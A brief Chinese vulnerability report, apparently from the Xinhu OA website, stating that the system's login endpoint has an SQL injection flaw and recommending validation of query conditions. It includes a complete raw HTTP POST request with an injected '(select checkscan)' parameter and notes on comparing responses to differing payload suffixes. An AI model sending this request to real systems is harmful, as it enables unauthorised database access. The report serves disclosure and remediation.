系统存在sql注入漏洞

测试用例：

post /index.php?a=%28select+checkscan%29&m=login&d=&ajaxbool=true&rnd=487355 http/1.1

content-length: 112

host: xxxx

connection: keep-alive

user-agent: mozilla/5.0 compatible; msie 9.0; windows nt 6.1; wow64; trident/5.0

cookie: phpsessid=b09g0ca9254emrahh62fheo9jg

accept: application/json, text/javascript, *

x-requested-with: xmlhttprequest

upgrade-insecure-requests: 1

referer: http://xxxx/?m=login

sec-fetch-dest: document

sec-fetch-site: same-origin

sec-fetch-user: ?1

accept-encoding: gzip, deflate, br

accept-language: en-us,en;q=0.9

content-type: application/x-www-form-urlencoded

sec-fetch-mode: navigate

rempass=0&jmpass=false&device=1758700919015&ltype=0&adminuser=mq%3a%3a&adminpass=revdmflqqvntv09sra%3a%3a&yanzm=

备注信息：

对比参数值后缀("+v+")和("+v+","+v+")后的服务器的返回结果，两个结果不同，建议在代码中加入对sql语句查询条件的判断。

[img,{fileurl}/img/81124.png,700]

[img,{fileurl}/img/100587.png,700]

原创文章，禁止转载复制，信呼OA官网保留一切知识产权。